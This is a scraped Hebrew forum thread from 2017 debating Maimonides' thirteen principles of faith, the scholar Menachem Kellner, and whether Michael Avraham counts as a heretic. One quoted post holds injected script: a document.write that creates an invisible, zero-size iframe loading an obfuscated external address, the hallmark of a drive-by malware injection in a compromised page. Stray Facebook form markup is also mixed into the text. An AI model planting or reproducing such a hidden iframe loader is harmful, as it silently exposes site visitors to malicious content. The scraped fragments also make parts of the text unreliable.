בית פורומים עצור כאן חושבים

חכמים כאפיקורסים

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-12/6/2017 07:43 לינק ישיר 

שלוםטוב

אני מסכים שדברי הרמב"ם בהלכות יסודי התורה בהחלט אומרים את.דברם. ועם זאת, יש מה להתבונן. כי יש צורת קריאה וצורת כתיבה של טקסטים, צורת קריאה וצורת כתיבה כפי שעשה הרמב"ם, וכפי שחשב שאחרים יעשו בספרו. צורת קריאה וצורת כתיבה של החוקרים באוניברסיטה, וכפי שהם חושבים שהתכוון הרמב"ם. צורת קריאה וצורת כתיבה המקובלת בבתי המדרש. וכן הלאה. אני מניח, שהחוקר מנחם נאבת, למשל, מניח שאילו הרמב"ם היה מתכוון למשמעות המקובלת - אז לדעתו היה צריך לכתוב את העיקרים כהקדמה למשנה תורה, נניח כמו שבמורה נבוכים הוא כתב בהקדמה למי הספר מיועד. זו רק דוגמא, אבל ניתן לחשוב על דקדוקים רבים נוספים, שאולי יטו לכאן ולכאן את הסברא - מה חשב הרמב"ם על שלושה עשר העיקרים, ועל משמעותם עבור האדם הדתי, עבור הדת, עבור לימודה, וכו'. אני מסכים שא"א לומר שבעצם זה משהו שולי, וזה גם תלוי הרבה ב"דברים שבעל פה" - כלומר מה הרמב"ם, נניח, אמר בפועל לאנשים שבאו לקרוא את ספריו, או שלא קראו את ספריו אלא פשוט שאלו אותו בקיצור מה עליהם לעשות או במה מצווה אדם להאמין וכו'. אינני אומר שום דבר לא לכאן ולא לכאן לגבי הרמב"ם או העיקרים, אני אומר רק לגבי מה אם אנו רוצים שתהיה הבנה בין לומדי הספרים - נניח בין לומדי בית המדרש לבין הלומדים באוניברסיטה. וזה היה חלקי מכל עמלי.

דדווח על תוכן פוגעני

נשלח ב-13/6/2017 00:37 לינק ישיר 

שערי תאוריות לא ננעלו, ותמיד אפשר להטות דברים, עובדות, ואפילו היסטוריות שלימות לכאן ולכאן.

אבל כשיש לנו מסורה נגד תאוריה, ושניהם מסודרים בלי קושיות, המסורה והמקובל מכריע את הכף נגד התאוריה.
אין שום הגיון לקבל תאוריה נגד מסורה ומה שהיה מקובל עד היום כשאין קושיות על זה.

אם עד היום ידענו שהרמב"ם יסד י"ג יסודות ביהדות וכן משמע מדבריו בספרו ובכתביו, למה שאני יקבל תאוריה שהוא לא התכוון שהם יהיו יסודות בדת נגד מה שמקובל עד היום, ובספריו נמציא תאוריות מישניות לבאר למה הוא כתב כך ולמה הוא כתב כך.

לא בגלל שמנחם טעה בשיטתו של הרמב"ם אני כבר צריך לקפוץ אחריו ולעזוב את מה שידעתי עד היום ומה שמשמע בפשטות מדברי הרמב"ם. אין לי ספק שאם היית קורא את ספר המדע, ולא היית שומע על טעותו של מנחם לא היית מעלה על דעתך שאפשר ללכת לכיוון הזה בכלל.

זה בכללי בכל התאוריות למיניהם. לגבי הי"ג יסודות, אני לא רואה מה הרמב"ם היה צריך לעשות יותר כדי להעביר את המסר. הוא כתב בהקדמה שספר המדע ידבר מיסודי הדת, בספר עצמו הוא כותב כמה פעמים שהם 'מיסודי הדת', את כל האלו שלא מודים אפילו ביסוד אחד מהי"ג הוא הכניס לקטגוריה של אלו שאין להם חלק לעולם הבא, הוא קורא להם מינים אפיקורסים וכופרים בתורה. כאילו שאם היה מקדים את היסודות למשנה תורה זה היה הפטיש שיפוצץ את אלו שיאמרו שהם לא היסודות של היהדות. אולי בדיוק הפוך אז היה מפתחים איזה תאוריה שמזה שהוא הקדים את זה למשנה תורה, מכאן ראיה שזה לא העיקר של הדת. ושוב שערי תאוריות לא ננעלו.

אם מנחם התכוון שבמשנה תורה אין את המילים "י"ג עיקרים", חבל לו לחפש את זה. זה כמו הטעות שעושים אלו שמחפשים את המילים "מעמד הר סיני" בנ"ך, כי אפילו בתורה לא כתוב 'מעמד הר סיני'.

ברור שמונחים משתנים, היום אנחנו קוראים לזה כך ובעוד דור או שנים יקראו לזה בשם אחר. מה שלא משתנה הן העובדות. היום אנחנו אומרים מעמד הר סיני, דוד המלך קרא לזה מעמד הקמת תורה בישראל, ונחמיה קרא לזה 'מעמד דיבור ה' מן השמים עם ישראל'. אותו דבר לגבי הי"ג עיקרים, הרמב"ם בפירוש המשניות בכלל לא קרא להן עיקרים, הוא קורא להם יסודות. הרמב"ם קרא להם "יסודות הדת" או "עקרי הדת" וכיום זה נקרא י"ג עיקרים. ואת עקרי הדת יש לך גם בהקדמה למשנה תורה "בו אכלול כל המצוות שהן עיקר דת משה רבינו לידע אותן תחלת הכל"

תוקן על ידי שלוםטוב ב- 13/06/2017 00:38:07

דדווח על תוכן פוגעני

נשלח ב-13/6/2017 07:47 לינק ישיר 

שלוםטוב

תראה, אני בהחלט לא מסכים עם כל דבר שהחוקר מנחם נאבת כתב. אבל אם הוא אומר, נניח שי"ג העיקרים "הם לא באמת עיקרים" - צריך לשים לב מה בדיוק הוא אמר ומה לא. בדיוק כמו שאנו עושים כאשר אנו קוראים בטקסט שכתב איש דת. לא בגלל שהדת והחקירה הם אותו דבר, אלא בגלל ששניהם נכתבו ע"י בני אדם, ומה שחשוב הוא האמת - וגם הקב"ה - חותמו אמת. הקב"ה אינו חותם במילים "אלוקי האלוקים, משרד הדתות, ירושלים". וגם לא "עתיק יומין, בעל המסורה". הקב"ה חותם ב"אמת". מה שאמר החוקר מנחם נאבת, אינו שונה ממה שאומרים חוקרים או לומדים בתחום הזה או בכל מיני תחומים אחרים, תמיד יכולים להיות בכל אמירה - גם חלקים מדוייקים יותר, וגם חלקים מדוייקים פחות. לימדונו חז"ל "ארבע מידות ביושבים לפני חכמים: ספוג ומשפך משמרת ונפה". והמובחר שבכולם - נפה, שמוציאה את הקמח וקולטת את הסולת. אין אפשרות לקבל רק סולת, גם אין מי שמקבל רק קמח. כולמנו מקבלים את הדברים כשהם מורכבים, ועבודתנו היא לעשות "בירורים" מלשון "ברירה". לברור ולקחת כל דבר המתאים - מתאים לאמת ומתאים לנו. י"ג עיקרים אינם כתובים אפילו בחמישה חומשי תורה. מה יותר עיקר: י"ג עיקרים או עשרת הדיברות? אתה יודע שאפילו עשרת הדיברות, תיקנו שלא יזכירום בכל יום - וכל כך למה - שלא יאמרו: אין תורה אלא זו. האם אינך חושב שבאותה דרך יש להתייחס להזכרת י"ג עיקרים? לכן אנו צריכים להיזהר לפני שאנחנו יוצאים נגד מישהו שכתב דבר בעל משמעות, גם אם אנו לא מסכימים איתו, וגם אם פשטות האמונה המקובלת אינה כך. כי פעמים רבות, אחר העיון נגלה, שבעצם מה שנאמר איננו נגד האמונה באמת, אלא רק מבהיר נקודה מסויימת בקשר אליה. ושוב, לא אמרתי כלום לגבי אם החוקר מנחם נאבת כותב או לא, ייתכן בהחלט שהוא טועה טעות חמורה. אבל אני מבהיר איך לדעתי צריך להתייחס לדבריו בהסתכלות ראשונית. 

דדווח על תוכן פוגעני

נשלח ב-13/6/2017 07:49 לינק ישיר 

ואם תאמר, והכתיב: ולא תתורו.
אף אני אומר כנגדך, שכך כתיב: ישוטטו רבים ותרבה הדעת.

דדווח על תוכן פוגעני

נשלח ב-14/6/2017 00:12 לינק ישיר 

ונאמר והשבת אל לבבך וידעת את ה'

דדווח על תוכן פוגעני

נשלח ב-14/6/2017 00:23 לינק ישיר 

לא הבנתי מה אתה מתכוון, אבל אפשר להמשיך:
ונאמר: כי שאל נא לימים ראשונים אשר היו לפניך ולמן היום אשר ברא אלקים אדם על הארץ ולמקצה השמים ועד קצה השמים

דדווח על תוכן פוגעני

נשלח ב-14/6/2017 00:26 לינק ישיר 

אני התכונתי לטובתך
רבינו בחיי בחובת הלבבות כותב שיש חיוב לחקור בעניני אמונה שנאמר והשבת אל לבבך וידעת

לגופן של דברים אני מכין את תגובתי

דדווח על תוכן פוגעני

נשלח ב-16/6/2017 16:58 לינק ישיר 

מיכאל אברהם אפיקורס #2

ביקשו ממני בשבוע האחרון להמשיך את הפולמוס על טענתי שמיכאל אברהם אפיקורס ועל תגובתו.

אין ספק שיש למיכאל אברהם כישרון כתיבה מדהים, אבל הכישרון הזה לא הופך את דבריו ליותר נכונים ויותר צודקים.

גבולות הגזרה של היהדות אינם חדים, כמו שגבולות הגזרה של השבת אינם חדים וברורים, יש בין השמשות ויש מחלוקת מהו בין השמשות ומה אורכו. אך למרות זאת ברור שיום שלישי הוא לא שבת וברור שיום שבת בבוקר הוא כן שבת.

אין לי אפיקורסומטר ואין לי דרך לקבוע את הגבול המדויק, אך ברור שיש גבול. לענ"ד מיכאל אברהם עבר את הגבול.

אם אתה לא מקבל את העובדה שכל התורה שבכתב היא מן השמיים - עברת את הגבול. אז נכון, יש מחלוקת בין התנאים האם 8 הפסוקים האחרונים שבתורה המתארים את הזמן שלאחר פטירת משה נכתבו על ידי משה רבנו או על ידי יהושע בן נון, אך על שאר התורה אין מחלוקת. זה שיש מחלוקת על 8 פסוקים האחרונים, לא מבטל את המסורת על כל התורה למעט שמונת הפסוקים האלה. 
 יש מחלוקת האם קול תרועה שמוזכר בתורה הוא שברים או תרועה. נכון, יש שתי מסורות, אך עצם קיום המחלוקת לא אומר שאולי בכלל לא מדובר בצליל שיוצא מתוך השופר אלא באיגואנה.

כשמיכאל אברהם לוקח את המחלוקת על 8 הפסוקים (נניח, נניח, 12 פסוקים למרות שאינני סבור שזו כוונת הראב"ע), ובעצם מיישם אותה על איזה חלק שהוא רוצה בתורה 'אם יש לו קושיות שהוא ניתן בסיני' הוא בעצם פורץ לחלוטין את הגבול.

נכון, יש מקום שאנו רואים בחוש ('בא הרוג ברגליו') שהנחת היסוד העובדתית של חז"ל לא נכונה. אך זה לא פורץ לחלוטין את הגזרה. לשיטתו של מיכאל אברהם אין ממש הבדל, ואפשר לחלוק עליהם בכל תחום, עובדתי או מחשבתי או הלכתי ועל סמך כל ראיה או פילוסופיה קלושה. זה אבסורד. ע"ע יחסו לגוים. אבל הוא מפליג עוד יותר, וגם על הנביאים אפשר לשיטת מיכאל אברהם לחלוק אם ברור לו שהם טועים. איך ברור לו? שאלה טובה. גם פסוקים בתורה אינם משכנעים אותו בהכרח.

נכון, יש מחלוקת בין רבותינו הראשונים מהם בדיוק עיקרי היהדות. לא כולם הסכימו עם הרמב"ם, אך סוף סוף יש עיקרים. נכון, יש מחלוקת האם האמונה בתחיית המתים היא חלק מעיקרי האמונה או לא, אבל אין שום מחלוקת שיש תחיית המתים.

נכון, גם את כתביו של הרמב"ם רצו לשרוף (ואולי אף שרפו בפועל) בטענה שהוא אפיקורס. אבל על הרמב"ם העלילו עלילת שווא שהוא כופר בתחיית המתים, בעוד שמיכאל אברהם מפקפק באמונה זו בפה מלא! אז מה המקום להשוות?

אז אפשר לדון האם אמונה שהקב"ה מאזין לתפילותינו היא אחד מהעיקרים או לא. אבל אין אף אחד מחכמי ישראל שטען שאין שום משמעות לתפילה ושהקב"ה בכלל לא מתערב בעולם.

אבל אסיים בשבחו. מדהים בעיניי שאדם שלא מאמין ששום מילה שהוא מתפלל משפיעה משהו ושיש מישהו שמקשיב, ואף כותב לשואליו שהתפילות הן ארוכות ומעצבנות אך בכל זאת מקפיד 3 פעמים ביום על תפילה במניין. מרשים. אני רק מציע לראות מי קדמו בגישה הזו, וכיצד הוא סיים את חייו ולאן הגיעו תלמידיו וממשיכי דרכו.

הוא באמת חושב שהוא מציל מישהו בגישתו ההזויה? הוא באמת חושב שאנשים יישארו נאמנים לה' ולתורתו, יקפידו על תורה ותפילה בגלל איזה פליק-פלאק מחשבתי על סמכות פורמלית של חז"ל והנביאים אחרי שהוא מרוקן מכל תוכן את הקשר לה' ואת החיבור לחכמי ישראל? אתמהה.

שבת שלום מהותית, פורמלית ושמרנית, 
 אבישי

* rel="async" method="post" data-ft="{"tn":"]"}" action="https://www.facebook.com/ajax/ufi/modify.php" id="u_jsonp_2_u" style="margin: 0px; padding: 0px;">

דדווח על תוכן פוגעני

נשלח ב-18/6/2017 23:33 לינק ישיר 

התחלתי סוף סוף לקרוא את הטקסט הארוך של מיכי חברנו שהעתקתי והדבקתי.

חשוב מאד. ויש שם דברים שצריך לדון בהם, בלי קשר כלל לשאלה אם זו אפיקורסות או לא.

נראה לי שבתוך הדיון המרתק הזה, של מיכי, התוקפים אותו, הדנים בדברים וכולנו, יש כמה נושאים ראשיים. יתכן שהם חופפים חלקית.

א. מה זה אפיקורסות. איך משתמשים במילה הזו. למי היא מתאימה היום. האם זה נורא להשתמש בה.

ב. האם יש עמדות שאסור להביע? שאלות שאסור לשאול?

ג. איך יודעים מה נכון ומה לא. האם יש עדיפות לעמדה מנומקת על פני שאינה כזו.

ד. שאלות נושאיות שונות, כמו האם חכמים יכלו לטעות, האם היו אירועים מסויימים בהיסטוריה כמו אלו שהמסורת שלנו בנויה עליהם, ועוד. ואיך מתייחסים לשאלות כאלו.

סברתי שראוי לדון בחלק הראשון וממנו ישתמע גם לגבי החלק השני. לגבי החלק השלישי, כתב מיכי דברים חשובים מאד. איני מסכים למה שהבנתי מדבריו, שעמדה מנומקת תמיד ראוי לאמץ. אם הנמקה היא מעין הוכחה או הצגת טיעון תקף, כלומר שבו המסקנה נובעת מן ההנחות, זה עדיין לא אומר שמסקנה היא נכונה. תקפות מבטיחה שאם ההנחות נכונות אז גם המסקנה כך. אבל זה שמישהו בנה טיעון יפה ומסודר ומנומק ואפילו תקף אינו מבטיח כלום. צריך בדיקה של ההנחות.

למעשה מיכי מסביר זאת בכמה מקומות. לפיכך אני מניח שבעמדה מנומקת כוונתו שגם ההנחות וגם המסקנה שמתבססת עליהן מרשימות את הקורא שהן נכונות.

ובכן, חזרה לסדר הראשון שקבעתי לעצמי.

מה זו אפיקורסות? אפיקורס המקורי היה פילוסוף יווני, שלפי הידוע לנו לא האמין באלים. כמדומה שהוא היה הדוניסט, כלומר האמין בגישה של לנצל את העולם הזה כי זה כל מה שיש.

חז"ל לקחו את המילה "אפיקורס" והשתמשו בה עבור מי שיש לו דעות פסולות. גם מי שאינו מכבד ראוי את החכמים מוגדר כאפיקורס. ואפילו מי שמבזה את חברו ליד חכם ייחשב לאפיקורס (ויש על זה מעשה בתלמוד שמדגים זאת).

אפשר לשער שיש רמות שונות וסוגים שונים של אפיקורסות.

ב. עד היכן מותר לשאול שאלות? עד כמה התשובות יכולות להיות שונות מן המסורת? ומה נעשה אם יש סתירה בין מה שנראה לנו אמיתי לפי ידיעותינו היום לבין מה שהמסורת קובעת?

למעשה על זה נפתח הפורום שלנו. על המוכנות להציג שאלות ולהתמודד. הצגת שאלות אינה אפיקורסות, אלא שיש להקפיד על דרך ארץ כיאות. לגבי התשובות, כאן יש בעיה.

נניח שאני (רק למשל תיאורטי) מגיע למסקנה שמשיחיות ומשיח אינם חלק מהותי של היהדות. אין לנו מה לצפות למשיח. אם יש מקום למשיח, הוא כבר בא פעם כאשר היה מאד טוב לעם ישראל, ולאחר מכן חזר להיות רע. האם אני אפיקורס?

ובכן, הדעה שהצגתי כאן מיוחסת לאמורא בשם הלל. אמנם עליו אומר רב יוסף שצריך שריבונו יסלח לו. אבל ראוי לשאול על מה הוא ראוי לסליחה: על זה שזו היתה מסקנתו או על זה שפירסם אותה ותלמידיו הפיצו אותה? ובכלל, האם יש לו עוון אם ניסה להגיע לאמת?

הנושא העיקרי שרציתי להעלות הוא זה: אם באמת הידע המודרני מביא לדחות מה שנחשב פעם ל"עיקרים" (ואיני דן בשאלה מדוע הם עיקרים או אם ראויים להחשב לכאלו, אלא רק אם הם תופסים מקום כזה בתודעתנו) - אם אדם שלמד ורכש מדע, פילוסופיה, חשיבה ביקורתית מוצא את עצמו שאינו יכול לקבל אמונות מסורת, מה זה אומר לא רק לגבי עצמו, ולא רק לגבי האופן שבו יתייחסו אליו, אלא מה זה אומר לגבי היהדות? התורה? אמונותינו?

בשעה שנטלתי חלק בפתיחת הפורום הזה היה לי אמון בתורה. היתה לי ביקורת על המסורת, כפי שיכולים לקרוא הקוראים באשכולות הפורום לדורותיו (דוגמא קלאסית: הקבלה היא בעיני מינות שנוצרה מאוחר, החל מלפני 800 שנה, ואני מוכן להצדיק את האשמתי זו). אך מה נעשה עם שאלות שנוגעות לעקרונות בסיסיים ועתיקים יותר.

לשמחתי אני מאמין שה' שומע תפילה ויש טעם להתפלל (גם אם אין חובה להתפלל את כל הנוסח המופיע בסידורים אלא רק את מה שתיקנו חכמינו). אני גם איני שולל את החיים שלאחר המוות ואת הגמול, ולא את היות התורה שבכתב מידי משה רבנו מפי ה' (אם כי את הרעיון הזה יש לפרש ולאו דווקא לפי פשוטו). אולם מה הייתי עושה אילו הייתי נאלץ מנימוקים מוצדקים לוותר על כמה מעקרונות אלו?

מה הייתי עושה ביני לביני? מה הייתי עושה עם ידיעותי? מה הייתי עושה עם אחרים שסבורים שבכך הפכתי לאפיקורוס?

דומה שמיכי שלנו (או שהיה שלנו, אבל איני מוותר עליו) מוצא את עצמו באותו מקום. והוא, ביושר לבב, מוכן לקבל את הכינוי "אפיקורס" בלי להיבהל. אני הייתי מעדיף לתקן. אם הוא מוכן לכינוי הזה, אני מעדיף לציין לידו תוספת: "אפיקורס לפי ההגדרה של זה וזה". ולהאריך בביאור הבעיה שמעוררת את המבקרים להדביק לו את הכינוי הזה.

ועל כל פנים, מיכי הוא אחד הבודדים שנלחמים את המלחמה על בירור הנכון והלא נכון, העיקר והטפל, בתוך היהדות שנמסרה לנו. מן הדיון הזה שחלקו הובא כאן באשכול נראה שמי שרוצה להשתתף בעיון כזה, שמוכן להיות ישר וחכם, יצטרך להתמודד גם עם ביקורת חברתית שתכנה אותו אפיקורס. זה אחד הדברים שרציתי להעלות בפתיחת האשכול. המחיר הזה.

מה שכואב וקשה עוד יותר הוא לעמוד מול זה שמה שגדלתי להאמין בו, שהיווה לי עצמי נחמה ושעל זה רציתי לגדל ולחנך את ילדי, גם זה אולי טעון בדיקה ותיקון. וכמעט שכחתי להזכיר שההתמודדות הזו, של מה אני עושה למען משפחתי וקהילתי (ותלמידי אולי) ועמי - באה רק לאחר שאני אוזר עוז להטיל ספק ולשאול כנגד מה שמחנכים לו, כלומר חוסר חשיבה ביקורתית. רק לאחר ייסורים אלו של איסוף האומץ לעמוד מול השאלות באים הייסורים החדשים, של האיש שמבקש לסייע לאחרים שמחפשים את האמת גם אם היא קשה.

כמובן, אולי אני טועה מכל וכל. אולי באמת מיכי אפיקורס וגם אני אפיקורס והכי טוב להחרים אותנו...

אמנם, אם כבר הגעתם עד לכאן, הרי אתם חברים קוראים בפורום הזה, ונחשפתם. מן הסתם אתם מבקשי אמת, אז אם התחלתם בדרך - המשיכו.

חותמו של הקב"ה אמת.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-23/6/2017 18:20 לינק ישיר 

מיימוני כתב:

הנושא העיקרי שרציתי להעלות הוא זה: אם באמת הידע המודרני מביא לדחות מה שנחשב פעם ל"עיקרים" 

< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

"עיקרים" הם מאת הרמב"ם, ולפני לבקר עליהם יש לדעת את השקפת הרמב"ם, השקפתו הפילוסופית.
יש לזכור כמו שזוכרים את לוח-הכפל, לזכור "שלוש כתות", מאותו הספר ש"עיקרים", ויחס אנשים לפשט הוא אבן-בוחן על-פיה הרמב"ם מבדיל את כלל האנשים לשלוש כתות:
[א.] "סוברין שלא כוונו החכמים ז"ל בכל דבריהם הישרים והמתוקנים, אלא מה שהבינו לפי דעתם מהם, ושהם על פשוטם. ואע"פ שהנראה מקצת דבריהם יש בהם מן הדיבה והריחוק מן השכל, עד שאילו סופר על פשוטו לעמי הארץ - כל שכן לחכמים - היו תמהים בהתבוננם בהם, והם אומרים היאך יתכן שיהיה בעולם אדם שיחשוב בזה או שיאמין שהיא אמונה נכונה, קל וחומר שייטיב בעיניו?! וזו הכת עניית הדעת יש להצטער עליהם לסכלותם... כי הכת הזאת מאבדים הדרת התורה ומאפילים זהרה, ומשימים תורת ה' בהפך המכוון בה... והכת הזאת מספרים מפשטי דברי החכמים זיכרונם לברכה, שכששומעין אותם שאר האומות אומרים: 'רק עם סכל ונבל הגוי הקטן הזה"
[ב.] "והכת השניה הם רבים גם כן, והם אותם שראו דברי החכמים או שמעום והבינו אותם כפי פשוטם, וחשבו שלא כיוונו חכמים בו זולתי מה שמורה עליו פשט הדבר, והם באים לסכל אותם ולגנותם ומוציאים דיבה על מה שאין בו דיבה, וילעגו על דברי חכמים ושכלם יותר זך מהם... וכמה הם רחוקים מן האנושיות אצל אותם שהם חכמים ופילוסופים על האמת. אבל הם סכלים יותר מן הכת הראשונה, והרבה מהם פתיות."
[ג.] "והכת השלישית והם חי השם מעטים עד מאוד עד שאין ראוי לקרותם כת, אלא כמו שיאמר לשמש "מין" ורק היא יחידי. והם אותם בני אדם שנתברר אצלם גדולת החכמים ז"ל וטוב שכלם, ממה שנמצא בכלל דבריהם מורים על עניינים אמיתיים למאוד... ונתאמת להם שדבריהם יש לו נגלה ונסתר, וכי הם בכל מה שאומרים מן הדברים הנמנעים, דברו בהם בדרך חידה ומשל, כי הוא זה דרך החכמים הגדולים." (הקדמה לפרק חלק)

אפיקורסים הם בדרך כלל "פילוסופים" שגרים בכת השנייה, מי שמכריז עליהם "אפיקורסים" הם "הדרשנים" מהכת הראשונה.

איני חושב שעליך למהר להצטרף אל הכת השנייה. הפורום הזה שאתה מוביל מיועד להוביל את הכת השלישית אל הפילוסופיה על האמת.

לְיִשְׁרֵי-לֵב שִׂמְחָה

דדווח על תוכן פוגעני

נשלח ב-24/6/2017 21:39 לינק ישיר 

תודה. סמיילי ירוק.

דדווח על תוכן פוגעני

נשלח ב-25/6/2017 10:09 לינק ישיר 

ינוח כתב:

[א.] "סוברין שלא כוונו החכמים ז"ל בכל דבריהם הישרים והמתוקנים, אלא מה שהבינו לפי דעתם מהם, ושהם על פשוטם. ואע"פ שהנראה מקצת דבריהם יש בהם מן הדיבה והריחוק מן השכל, עד שאילו סופר על פשוטו לעמי הארץ - כל שכן לחכמים - היו תמהים בהתבוננם בהם, והם אומרים היאך יתכן שיהיה בעולם אדם שיחשוב בזה או שיאמין שהיא אמונה נכונה, קל וחומר שייטיב בעיניו?! וזו הכת עניית הדעת יש להצטער עליהם לסכלותם... כי הכת הזאת מאבדים הדרת התורה ומאפילים זהרה, ומשימים תורת ה' בהפך המכוון בה... והכת הזאת מספרים מפשטי דברי החכמים זיכרונם לברכה, שכששומעין אותם שאר האומות אומרים: 'רק עם סכל ונבל הגוי הקטן הזה"

לְיִשְׁרֵי-לֵב שִׂמְחָה

איינשטיין אמר "אם אתה לא יכול להסביר את זה בפשטות, אתה לא מבין את זה מספיק טוב"
ולכן אם לא מבינים את דברי החכמים בפשטות, זה סימן שהם לא הבינו בעצמם.

If you can't explain it simply, you don't understand it well enough.
Albert Einstein

דדווח על תוכן פוגעני

נשלח ב-27/6/2017 07:55 לינק ישיר 

מיימוני, למה 'אפיקורס לפי ההגדרה של זה וזה'?
יש מי שמגדיר אחרת את העיקר של 'תורה מן השמים'? או של 'תחית המתים'? אם מישהו לא מאמין שהתורה מן השמים אלא ש'מן הסתם משהו ניתן שם ואי אפשר לדעת מה', או לא מאמין בתחית המתים, הוא הרויח את התואר ביושר.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > חכמים כאפיקורסים
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 סך הכל 2 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.